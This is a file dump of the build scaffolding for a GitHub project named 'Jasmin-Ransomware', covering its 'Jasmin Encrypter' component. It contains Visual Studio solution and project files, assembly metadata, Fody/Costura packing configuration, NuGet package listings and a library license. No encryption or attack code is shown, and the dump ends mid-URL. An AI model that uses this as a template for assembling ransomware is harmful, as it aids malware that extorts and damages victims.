https://raw.githubusercontent.com/codesiddhant/Jasmin-Ransomware/b766d10c21bd75f07b7d5afad860d06884623f2b/Jasmin Encrypter/.vs/Jasmin Encryptor/v16/Server/sqlite3/db.lock -------------------------------------------------------------------------------- /Jasmin Encrypter/.vs/Jasmin Encryptor/v16/Server/sqlite3/storage.ide: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codesiddhant/Jasmin-Ransomware/b766d10c21bd75f07b7d5afad860d06884623f2b/Jasmin Encrypter/.vs/Jasmin Encryptor/v16/Server/sqlite3/storage.ide -------------------------------------------------------------------------------- /Jasmin Encrypter/App.config: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /Jasmin Encrypter/FodyWeavers.xml: -------------------------------------------------------------------------------- 1 |  2 | 3 | -------------------------------------------------------------------------------- /Jasmin Encrypter/FodyWeavers.xsd: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | A list of assembly names to exclude from the default action of "embed all Copy Local references", delimited with line breaks 13 | 14 | 15 | 16 | 17 | A list of assembly names to include from the default action of "embed all Copy Local references", delimited with line breaks. 18 | 19 | 20 | 21 | 22 | A list of unmanaged 32 bit assembly names to include, delimited with line breaks. 23 | 24 | 25 | 26 | 27 | A list of unmanaged 64 bit assembly names to include, delimited with line breaks. 28 | 29 | 30 | 31 | 32 | The order of preloaded assemblies, delimited with line breaks. 33 | 34 | 35 | 36 | 37 | 38 | This will copy embedded files to disk before loading them into memory. This is helpful for some scenarios that expected an assembly to be loaded from a physical file. 39 | 40 | 41 | 42 | 43 | Controls if .pdbs for reference assemblies are also embedded. 44 | 45 | 46 | 47 | 48 | Embedded assemblies are compressed by default, and uncompressed when they are loaded. You can turn compression off with this option. 49 | 50 | 51 | 52 | 53 | As part of Costura, embedded assemblies are no longer included as part of the build. This cleanup can be turned off. 54 | 55 | 56 | 57 | 58 | Costura by default will load as part of the module initialization. This flag disables that behavior. Make sure you call CosturaUtility.Initialize() somewhere in your code. 59 | 60 | 61 | 62 | 63 | Costura will by default use assemblies with a name like 'resources.dll' as a satellite resource and prepend the output path. This flag disables that behavior. 64 | 65 | 66 | 67 | 68 | A list of assembly names to exclude from the default action of "embed all Copy Local references", delimited with | 69 | 70 | 71 | 72 | 73 | A list of assembly names to include from the default action of "embed all Copy Local references", delimited with |. 74 | 75 | 76 | 77 | 78 | A list of unmanaged 32 bit assembly names to include, delimited with |. 79 | 80 | 81 | 82 | 83 | A list of unmanaged 64 bit assembly names to include, delimited with |. 84 | 85 | 86 | 87 | 88 | The order of preloaded assemblies, delimited with |. 89 | 90 | 91 | 92 | 93 | 94 | 95 | 96 | 'true' to run assembly verification (PEVerify) on the target assembly after all weavers have been executed. 97 | 98 | 99 | 100 | 101 | A comma-separated list of error codes that can be safely ignored in assembly verification. 102 | 103 | 104 | 105 | 106 | 'false' to turn off automatic generation of the XML Schema file. 107 | 108 | 109 | 110 | 111 | -------------------------------------------------------------------------------- /Jasmin Encrypter/Hopstarter-Soft-Scraps-Lock-Lock.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codesiddhant/Jasmin-Ransomware/b766d10c21bd75f07b7d5afad860d06884623f2b/Jasmin Encrypter/Hopstarter-Soft-Scraps-Lock-Lock.ico -------------------------------------------------------------------------------- /Jasmin Encrypter/Jasmin Encryptor.csproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | Debug 7 | AnyCPU 8 | {78C76961-8249-4EFE-9DE2-B6EF15A187F7} 9 | WinExe 10 | Jasmin_Encryptor 11 | Jasmin Encryptor 12 | v4.5 13 | 512 14 | true 15 | 16 | 17 | publish\ 18 | true 19 | Disk 20 | false 21 | Foreground 22 | 7 23 | Days 24 | false 25 | false 26 | true 27 | 0 28 | 1.0.0.%2a 29 | false 30 | false 31 | true 32 | 33 | 34 | AnyCPU 35 | true 36 | full 37 | false 38 | bin\Debug\ 39 | DEBUG;TRACE 40 | prompt 41 | 4 42 | 43 | 44 | AnyCPU 45 | pdbonly 46 | true 47 | bin\Release\ 48 | TRACE 49 | prompt 50 | 4 51 | 52 | 53 | Hopstarter-Soft-Scraps-Lock-Lock.ico 54 | 55 | 56 | 57 | 58 | 59 | 60 | packages\Costura.Fody.4.1.0\lib\net40\Costura.dll 61 | 62 | 63 | packages\IpInfo.1.0.5.1\lib\net45\IpInfo.dll 64 | 65 | 66 | packages\Newtonsoft.Json.12.0.3\lib\net45\Newtonsoft.Json.dll 67 | 68 | 69 | packages\SharpCompress.0.24.0\lib\net45\SharpCompress.dll 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | 89 | 90 | 91 | 92 | 93 | 94 | 95 | False 96 | .NET Framework 3.5 SP1 97 | false 98 | 99 | 100 | 101 | 102 | 103 | 104 | This project references NuGet package(s) that are missing on this computer. Use NuGet Package Restore to download them. For more information, see http://go.microsoft.com/fwlink/?LinkID=322105. The missing file is {0}. 105 | 106 | 107 | 108 | 109 | -------------------------------------------------------------------------------- /Jasmin Encrypter/Jasmin Encryptor.csproj.user: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | publish\ 5 | 6 | 7 | 8 | 9 | 10 | en-US 11 | false 12 | 13 | -------------------------------------------------------------------------------- /Jasmin Encrypter/Jasmin Encryptor.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 16 4 | VisualStudioVersion = 16.0.29613.14 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Jasmin Encryptor", "Jasmin Encryptor.csproj", "{78C76961-8249-4EFE-9DE2-B6EF15A187F7}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|Any CPU = Debug|Any CPU 11 | Release|Any CPU = Release|Any CPU 12 | EndGlobalSection 13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 14 | {78C76961-8249-4EFE-9DE2-B6EF15A187F7}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 15 | {78C76961-8249-4EFE-9DE2-B6EF15A187F7}.Debug|Any CPU.Build.0 = Debug|Any CPU 16 | {78C76961-8249-4EFE-9DE2-B6EF15A187F7}.Release|Any CPU.ActiveCfg = Release|Any CPU 17 | {78C76961-8249-4EFE-9DE2-B6EF15A187F7}.Release|Any CPU.Build.0 = Release|Any CPU 18 | EndGlobalSection 19 | GlobalSection(SolutionProperties) = preSolution 20 | HideSolutionNode = FALSE 21 | EndGlobalSection 22 | GlobalSection(ExtensibilityGlobals) = postSolution 23 | SolutionGuid = {8F2294EF-5374-47C2-8EB3-D7F36D99B29F} 24 | EndGlobalSection 25 | EndGlobal 26 | -------------------------------------------------------------------------------- /Jasmin Encrypter/Properties/AssemblyInfo.cs: -------------------------------------------------------------------------------- 1 | using System.Reflection; 2 | using System.Runtime.CompilerServices; 3 | using System.Runtime.InteropServices; 4 | 5 | // General Information about an assembly is controlled through the following 6 | // set of attributes. Change these attribute values to modify the information 7 | // associated with an assembly. 8 | [assembly: AssemblyTitle("Jasmin Encryptor")] 9 | [assembly: AssemblyDescription("")] 10 | [assembly: AssemblyConfiguration("")] 11 | [assembly: AssemblyCompany("")] 12 | [assembly: AssemblyProduct("Jasmin Encryptor")] 13 | [assembly: AssemblyCopyright("Copyright © 2021")] 14 | [assembly: AssemblyTrademark("")] 15 | [assembly: AssemblyCulture("")] 16 | 17 | // Setting ComVisible to false makes the types in this assembly not visible 18 | // to COM components. If you need to access a type in this assembly from 19 | // COM, set the ComVisible attribute to true on that type. 20 | [assembly: ComVisible(false)] 21 | 22 | // The following GUID is for the ID of the typelib if this project is exposed to COM 23 | [assembly: Guid("78c76961-8249-4efe-9de2-b6ef15a187f7")] 24 | 25 | // Version information for an assembly consists of the following four values: 26 | // 27 | // Major Version 28 | // Minor Version 29 | // Build Number 30 | // Revision 31 | // 32 | // You can specify all the values or you can default the Build and Revision Numbers 33 | // by using the '*' as shown below: 34 | // [assembly: AssemblyVersion("1.0.*")] 35 | [assembly: AssemblyVersion("1.0.0.0")] 36 | [assembly: AssemblyFileVersion("1.0.0.0")] 37 | -------------------------------------------------------------------------------- /Jasmin Encrypter/obj/Release/Costura/0165A7E6E6D214D5FB18A09E91E5106FCAA97A8A.costura.ipinfo.dll.compressed: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codesiddhant/Jasmin-Ransomware/b766d10c21bd75f07b7d5afad860d06884623f2b/Jasmin Encrypter/obj/Release/Costura/0165A7E6E6D214D5FB18A09E91E5106FCAA97A8A.costura.ipinfo.dll.compressed -------------------------------------------------------------------------------- /Jasmin Encrypter/obj/Release/Costura/1248142EB45EED3BEB0D9A2D3B8BED5FE2569B10.costura.newtonsoft.json.dll.compressed: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codesiddhant/Jasmin-Ransomware/b766d10c21bd75f07b7d5afad860d06884623f2b/Jasmin Encrypter/obj/Release/Costura/1248142EB45EED3BEB0D9A2D3B8BED5FE2569B10.costura.newtonsoft.json.dll.compressed -------------------------------------------------------------------------------- /Jasmin Encrypter/obj/Release/Costura/5954E332EC7732BA34C27E2D88D154D1919C1B07.costura.costura.dll.compressed: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codesiddhant/Jasmin-Ransomware/b766d10c21bd75f07b7d5afad860d06884623f2b/Jasmin Encrypter/obj/Release/Costura/5954E332EC7732BA34C27E2D88D154D1919C1B07.costura.costura.dll.compressed -------------------------------------------------------------------------------- /Jasmin Encrypter/obj/Release/Costura/70F41BF2BAA694D4393D87B721486B8783B65ADE.costura.sharpcompress.dll.compressed: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codesiddhant/Jasmin-Ransomware/b766d10c21bd75f07b7d5afad860d06884623f2b/Jasmin Encrypter/obj/Release/Costura/70F41BF2BAA694D4393D87B721486B8783B65ADE.costura.sharpcompress.dll.compressed -------------------------------------------------------------------------------- /Jasmin Encrypter/obj/Release/DesignTimeResolveAssemblyReferencesInput.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codesiddhant/Jasmin-Ransomware/b766d10c21bd75f07b7d5afad860d06884623f2b/Jasmin Encrypter/obj/Release/DesignTimeResolveAssemblyReferencesInput.cache -------------------------------------------------------------------------------- /Jasmin Encrypter/obj/Release/Jasmin Encryptor.csproj.FileListAbsolute.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codesiddhant/Jasmin-Ransomware/b766d10c21bd75f07b7d5afad860d06884623f2b/Jasmin Encrypter/obj/Release/Jasmin Encryptor.csproj.FileListAbsolute.txt -------------------------------------------------------------------------------- /Jasmin Encrypter/packages.config: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | -------------------------------------------------------------------------------- /Jasmin Encrypter/packages/Costura.Fody.4.1.0/.signature.p7s: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codesiddhant/Jasmin-Ransomware/b766d10c21bd75f07b7d5afad860d06884623f2b/Jasmin Encrypter/packages/Costura.Fody.4.1.0/.signature.p7s -------------------------------------------------------------------------------- /Jasmin Encrypter/packages/Costura.Fody.4.1.0/Costura.Fody.4.1.0.nupkg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codesiddhant/Jasmin-Ransomware/b766d10c21bd75f07b7d5afad860d06884623f2b/Jasmin Encrypter/packages/Costura.Fody.4.1.0/Costura.Fody.4.1.0.nupkg -------------------------------------------------------------------------------- /Jasmin Encrypter/packages/Costura.Fody.4.1.0/build/Costura.Fody.props: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | -------------------------------------------------------------------------------- /Jasmin Encrypter/packages/Costura.Fody.4.1.0/lib/net40/Costura.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codesiddhant/Jasmin-Ransomware/b766d10c21bd75f07b7d5afad860d06884623f2b/Jasmin Encrypter/packages/Costura.Fody.4.1.0/lib/net40/Costura.dll -------------------------------------------------------------------------------- /Jasmin Encrypter/packages/Costura.Fody.4.1.0/lib/net40/Costura.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | Costura 5 | 6 | 7 | 8 | 9 | Contains methods for interacting with the Costura system. 10 | 11 | 12 | 13 | 14 | Call this to Initialize the Costura system. 15 | 16 | 17 | 18 | 19 | -------------------------------------------------------------------------------- /Jasmin Encrypter/packages/Costura.Fody.4.1.0/weaver/Costura.Fody.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codesiddhant/Jasmin-Ransomware/b766d10c21bd75f07b7d5afad860d06884623f2b/Jasmin Encrypter/packages/Costura.Fody.4.1.0/weaver/Costura.Fody.dll -------------------------------------------------------------------------------- /Jasmin Encrypter/packages/Costura.Fody.4.1.0/weaver/Costura.Fody.xcf: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | A list of assembly names to exclude from the default action of "embed all Copy Local references", delimited with line breaks 7 | 8 | 9 | 10 | 11 | A list of assembly names to include from the default action of "embed all Copy Local references", delimited with line breaks. 12 | 13 | 14 | 15 | 16 | A list of unmanaged 32 bit assembly names to include, delimited with line breaks. 17 | 18 | 19 | 20 | 21 | A list of unmanaged 64 bit assembly names to include, delimited with line breaks. 22 | 23 | 24 | 25 | 26 | The order of preloaded assemblies, delimited with line breaks. 27 | 28 | 29 | 30 | 31 | 32 | This will copy embedded files to disk before loading them into memory. This is helpful for some scenarios that expected an assembly to be loaded from a physical file. 33 | 34 | 35 | 36 | 37 | Controls if .pdbs for reference assemblies are also embedded. 38 | 39 | 40 | 41 | 42 | Embedded assemblies are compressed by default, and uncompressed when they are loaded. You can turn compression off with this option. 43 | 44 | 45 | 46 | 47 | As part of Costura, embedded assemblies are no longer included as part of the build. This cleanup can be turned off. 48 | 49 | 50 | 51 | 52 | Costura by default will load as part of the module initialization. This flag disables that behavior. Make sure you call CosturaUtility.Initialize() somewhere in your code. 53 | 54 | 55 | 56 | 57 | Costura will by default use assemblies with a name like 'resources.dll' as a satellite resource and prepend the output path. This flag disables that behavior. 58 | 59 | 60 | 61 | 62 | A list of assembly names to exclude from the default action of "embed all Copy Local references", delimited with | 63 | 64 | 65 | 66 | 67 | A list of assembly names to include from the default action of "embed all Copy Local references", delimited with |. 68 | 69 | 70 | 71 | 72 | A list of unmanaged 32 bit assembly names to include, delimited with |. 73 | 74 | 75 | 76 | 77 | A list of unmanaged 64 bit assembly names to include, delimited with |. 78 | 79 | 80 | 81 | 82 | The order of preloaded assemblies, delimited with |. 83 | 84 | 85 | -------------------------------------------------------------------------------- /Jasmin Encrypter/packages/Fody.6.0.0/.signature.p7s: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codesiddhant/Jasmin-Ransomware/b766d10c21bd75f07b7d5afad860d06884623f2b/Jasmin Encrypter/packages/Fody.6.0.0/.signature.p7s -------------------------------------------------------------------------------- /Jasmin Encrypter/packages/Fody.6.0.0/Fody.6.0.0.nupkg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codesiddhant/Jasmin-Ransomware/b766d10c21bd75f07b7d5afad860d06884623f2b/Jasmin Encrypter/packages/Fody.6.0.0/Fody.6.0.0.nupkg -------------------------------------------------------------------------------- /Jasmin Encrypter/packages/Fody.6.0.0/build/Fody.targets: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | $(ProjectDir)FodyWeavers.xml 5 | $(MSBuildThisFileDirectory)..\ 6 | $(FodyPath)netstandardtask 7 | $(FodyPath)netclassictask 8 | $(FodyAssemblyDirectory)\Fody.dll 9 | $(DefaultItemExcludes);FodyWeavers.xsd 10 | true 11 | 15 12 | $([System.Version]::Parse($(MSBuildVersion)).Major) 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 37 | 38 | 40 | 59 | 60 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 76 | 77 | 81 | 82 | 85 | 86 | 87 | 88 | 89 | 90 | 91 | 92 | 93 | 94 | 95 | 100 | 101 | 108 | 109 | 110 | -------------------------------------------------------------------------------- /Jasmin Encrypter/packages/Fody.6.0.0/netclassictask/Fody.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codesiddhant/Jasmin-Ransomware/b766d10c21bd75f07b7d5afad860d06884623f2b/Jasmin Encrypter/packages/Fody.6.0.0/netclassictask/Fody.dll -------------------------------------------------------------------------------- /Jasmin Encrypter/packages/Fody.6.0.0/netclassictask/FodyCommon.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codesiddhant/Jasmin-Ransomware/b766d10c21bd75f07b7d5afad860d06884623f2b/Jasmin Encrypter/packages/Fody.6.0.0/netclassictask/FodyCommon.dll -------------------------------------------------------------------------------- /Jasmin Encrypter/packages/Fody.6.0.0/netclassictask/FodyHelpers.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codesiddhant/Jasmin-Ransomware/b766d10c21bd75f07b7d5afad860d06884623f2b/Jasmin Encrypter/packages/Fody.6.0.0/netclassictask/FodyHelpers.dll -------------------------------------------------------------------------------- /Jasmin Encrypter/packages/Fody.6.0.0/netclassictask/FodyIsolated.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codesiddhant/Jasmin-Ransomware/b766d10c21bd75f07b7d5afad860d06884623f2b/Jasmin Encrypter/packages/Fody.6.0.0/netclassictask/FodyIsolated.dll -------------------------------------------------------------------------------- /Jasmin Encrypter/packages/Fody.6.0.0/netclassictask/Mono.Cecil.Pdb.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codesiddhant/Jasmin-Ransomware/b766d10c21bd75f07b7d5afad860d06884623f2b/Jasmin Encrypter/packages/Fody.6.0.0/netclassictask/Mono.Cecil.Pdb.dll -------------------------------------------------------------------------------- /Jasmin Encrypter/packages/Fody.6.0.0/netclassictask/Mono.Cecil.Pdb.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codesiddhant/Jasmin-Ransomware/b766d10c21bd75f07b7d5afad860d06884623f2b/Jasmin Encrypter/packages/Fody.6.0.0/netclassictask/Mono.Cecil.Pdb.pdb -------------------------------------------------------------------------------- /Jasmin Encrypter/packages/Fody.6.0.0/netclassictask/Mono.Cecil.Rocks.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codesiddhant/Jasmin-Ransomware/b766d10c21bd75f07b7d5afad860d06884623f2b/Jasmin Encrypter/packages/Fody.6.0.0/netclassictask/Mono.Cecil.Rocks.dll -------------------------------------------------------------------------------- /Jasmin Encrypter/packages/Fody.6.0.0/netclassictask/Mono.Cecil.Rocks.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codesiddhant/Jasmin-Ransomware/b766d10c21bd75f07b7d5afad860d06884623f2b/Jasmin Encrypter/packages/Fody.6.0.0/netclassictask/Mono.Cecil.Rocks.pdb -------------------------------------------------------------------------------- /Jasmin Encrypter/packages/Fody.6.0.0/netclassictask/Mono.Cecil.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codesiddhant/Jasmin-Ransomware/b766d10c21bd75f07b7d5afad860d06884623f2b/Jasmin Encrypter/packages/Fody.6.0.0/netclassictask/Mono.Cecil.dll -------------------------------------------------------------------------------- /Jasmin Encrypter/packages/Fody.6.0.0/netclassictask/Mono.Cecil.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codesiddhant/Jasmin-Ransomware/b766d10c21bd75f07b7d5afad860d06884623f2b/Jasmin Encrypter/packages/Fody.6.0.0/netclassictask/Mono.Cecil.pdb -------------------------------------------------------------------------------- /Jasmin Encrypter/packages/Fody.6.0.0/netstandardtask/Fody.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codesiddhant/Jasmin-Ransomware/b766d10c21bd75f07b7d5afad860d06884623f2b/Jasmin Encrypter/packages/Fody.6.0.0/netstandardtask/Fody.dll -------------------------------------------------------------------------------- /Jasmin Encrypter/packages/Fody.6.0.0/netstandardtask/FodyCommon.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codesiddhant/Jasmin-Ransomware/b766d10c21bd75f07b7d5afad860d06884623f2b/Jasmin Encrypter/packages/Fody.6.0.0/netstandardtask/FodyCommon.dll -------------------------------------------------------------------------------- /Jasmin Encrypter/packages/Fody.6.0.0/netstandardtask/FodyHelpers.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codesiddhant/Jasmin-Ransomware/b766d10c21bd75f07b7d5afad860d06884623f2b/Jasmin Encrypter/packages/Fody.6.0.0/netstandardtask/FodyHelpers.dll -------------------------------------------------------------------------------- /Jasmin Encrypter/packages/Fody.6.0.0/netstandardtask/FodyIsolated.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codesiddhant/Jasmin-Ransomware/b766d10c21bd75f07b7d5afad860d06884623f2b/Jasmin Encrypter/packages/Fody.6.0.0/netstandardtask/FodyIsolated.dll -------------------------------------------------------------------------------- /Jasmin Encrypter/packages/Fody.6.0.0/netstandardtask/Mono.Cecil.Pdb.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codesiddhant/Jasmin-Ransomware/b766d10c21bd75f07b7d5afad860d06884623f2b/Jasmin Encrypter/packages/Fody.6.0.0/netstandardtask/Mono.Cecil.Pdb.dll -------------------------------------------------------------------------------- /Jasmin Encrypter/packages/Fody.6.0.0/netstandardtask/Mono.Cecil.Pdb.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codesiddhant/Jasmin-Ransomware/b766d10c21bd75f07b7d5afad860d06884623f2b/Jasmin Encrypter/packages/Fody.6.0.0/netstandardtask/Mono.Cecil.Pdb.pdb -------------------------------------------------------------------------------- /Jasmin Encrypter/packages/Fody.6.0.0/netstandardtask/Mono.Cecil.Rocks.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codesiddhant/Jasmin-Ransomware/b766d10c21bd75f07b7d5afad860d06884623f2b/Jasmin Encrypter/packages/Fody.6.0.0/netstandardtask/Mono.Cecil.Rocks.dll -------------------------------------------------------------------------------- /Jasmin Encrypter/packages/Fody.6.0.0/netstandardtask/Mono.Cecil.Rocks.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codesiddhant/Jasmin-Ransomware/b766d10c21bd75f07b7d5afad860d06884623f2b/Jasmin Encrypter/packages/Fody.6.0.0/netstandardtask/Mono.Cecil.Rocks.pdb -------------------------------------------------------------------------------- /Jasmin Encrypter/packages/Fody.6.0.0/netstandardtask/Mono.Cecil.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codesiddhant/Jasmin-Ransomware/b766d10c21bd75f07b7d5afad860d06884623f2b/Jasmin Encrypter/packages/Fody.6.0.0/netstandardtask/Mono.Cecil.dll -------------------------------------------------------------------------------- /Jasmin Encrypter/packages/Fody.6.0.0/netstandardtask/Mono.Cecil.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codesiddhant/Jasmin-Ransomware/b766d10c21bd75f07b7d5afad860d06884623f2b/Jasmin Encrypter/packages/Fody.6.0.0/netstandardtask/Mono.Cecil.pdb -------------------------------------------------------------------------------- /Jasmin Encrypter/packages/IpInfo.1.0.5.1/.signature.p7s: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codesiddhant/Jasmin-Ransomware/b766d10c21bd75f07b7d5afad860d06884623f2b/Jasmin Encrypter/packages/IpInfo.1.0.5.1/.signature.p7s -------------------------------------------------------------------------------- /Jasmin Encrypter/packages/IpInfo.1.0.5.1/IpInfo.1.0.5.1.nupkg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codesiddhant/Jasmin-Ransomware/b766d10c21bd75f07b7d5afad860d06884623f2b/Jasmin Encrypter/packages/IpInfo.1.0.5.1/IpInfo.1.0.5.1.nupkg -------------------------------------------------------------------------------- /Jasmin Encrypter/packages/IpInfo.1.0.5.1/lib/net45/IpInfo.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codesiddhant/Jasmin-Ransomware/b766d10c21bd75f07b7d5afad860d06884623f2b/Jasmin Encrypter/packages/IpInfo.1.0.5.1/lib/net45/IpInfo.dll -------------------------------------------------------------------------------- /Jasmin Encrypter/packages/IpInfo.1.0.5.1/lib/netstandard2.0/IpInfo.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codesiddhant/Jasmin-Ransomware/b766d10c21bd75f07b7d5afad860d06884623f2b/Jasmin Encrypter/packages/IpInfo.1.0.5.1/lib/netstandard2.0/IpInfo.dll -------------------------------------------------------------------------------- /Jasmin Encrypter/packages/IpInfo.1.0.5.1/nuget_icon.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codesiddhant/Jasmin-Ransomware/b766d10c21bd75f07b7d5afad860d06884623f2b/Jasmin Encrypter/packages/IpInfo.1.0.5.1/nuget_icon.png -------------------------------------------------------------------------------- /Jasmin Encrypter/packages/Newtonsoft.Json.12.0.3/.signature.p7s: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codesiddhant/Jasmin-Ransomware/b766d10c21bd75f07b7d5afad860d06884623f2b/Jasmin Encrypter/packages/Newtonsoft.Json.12.0.3/.signature.p7s -------------------------------------------------------------------------------- /Jasmin Encrypter/packages/Newtonsoft.Json.12.0.3/LICENSE.md: -------------------------------------------------------------------------------- 1 | The MIT License (MIT) 2 | 3 | Copyright (c) 2007 James Newton-King 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy of 6 | this software and associated documentation files (the "Software"), to deal in 7 | the Software without restriction, including without limitation the rights to 8 | use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of 9 | the Software, and to permit persons to whom the Software is furnished to do so, 10 | subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS 17 | FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR 18 | COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER 19 | IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN 20 | CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. 21 | -------------------------------------------------------------------------------- /Jasmin Encrypter/packages/Newtonsoft.Json.12.0.3/Newtonsoft.Json.12.0.3.nupkg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codesiddhant/Jasmin-Ransomware/b766d10c21bd75f07b7d5afad860d06884623f2b/Jasmin Encrypter/packages/Newtonsoft.Json.12.0.3/Newtonsoft.Json.12.0.3.nupkg -------------------------------------------------------------------------------- /Jasmin Encrypter/packages/Newtonsoft.Json.12.0.3/lib/net20/Newtonsoft.Json.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codesiddhant/Jasmin-Ransomware/b766d10c21bd75f07b7d5afad860d06884623f2b/Jasmin Encrypter/packages/Newtonsoft.Json.12.0.3/lib/net20/Newtonsoft.Json.dll -------------------------------------------------------------------------------- /Jasmin Encrypter/packages/Newtonsoft.Json.12.0.3/lib/net35/Newtonsoft.Json.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codesiddhant/Jasmin-Ransomware/b766d10c21bd75f07b7d5afad860d06884623f2b/Jasmin Encrypter/packages/Newtonsoft.Json.12.0.3/lib/net35/Newtonsoft.Json.dll -------------------------------------------------------------------------------- /Jasmin Encrypter/packages/Newtonsoft.Json.12.0.3/lib/net40/Newtonsoft.Json.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codesiddhant/Jasmin-Ransomware/b766d10c21bd75f07b7d5afad860d06884623f2b/Jasmin Encrypter/packages/Newtonsoft.Json.12.0.3/lib/net40/Newtonsoft.Json.dll -------------------------------------------------------------------------------- /Jasmin Encrypter/packages/Newtonsoft.Json.12.0.3/lib/net45/Newtonsoft.Json.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codesiddhant/Jasmin-Ransomware/b766d10c21bd75f07b7d5afad860d06884623f2b/Jasmin Encrypter/packages/Newtonsoft.Json.12.0.3/lib/net45/Newtonsoft.Json.dll -------------------------------------------------------------------------------- /Jasmin Encrypter/packages/Newtonsoft.Json.12.0.3/lib/netstandard1.0/Newtonsoft.Json.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codesiddhant/Jasmin-Ransomware/b766d10c21bd75f07b7d5afad860d06884623f2b/Jasmin Encrypter/packages/Newtonsoft.Json.12.0.3/lib/netstandard1.0/Newtonsoft.Json.dll -------------------------------------------------------------------------------- /Jasmin Encrypter/packages/Newtonsoft.Json.12.0.3/lib/netstandard1.3/Newtonsoft.Json.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codesiddhant/Jasmin-Ransomware/b766d10c21bd75f07b7d5afad860d06884623f2b/Jasmin Encrypter/packages/Newtonsoft.Json.12.0.3/lib/netstandard1.3/Newtonsoft.Json.dll -------------------------------------------------------------------------------- /Jasmin Encrypter/packages/Newtonsoft.Json.12.0.3/lib/netstandard2.0/Newtonsoft.Json.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codesiddhant/Jasmin-Ransomware/b766d10c21bd75f07b7d5afad860d06884623f2b/Jasmin 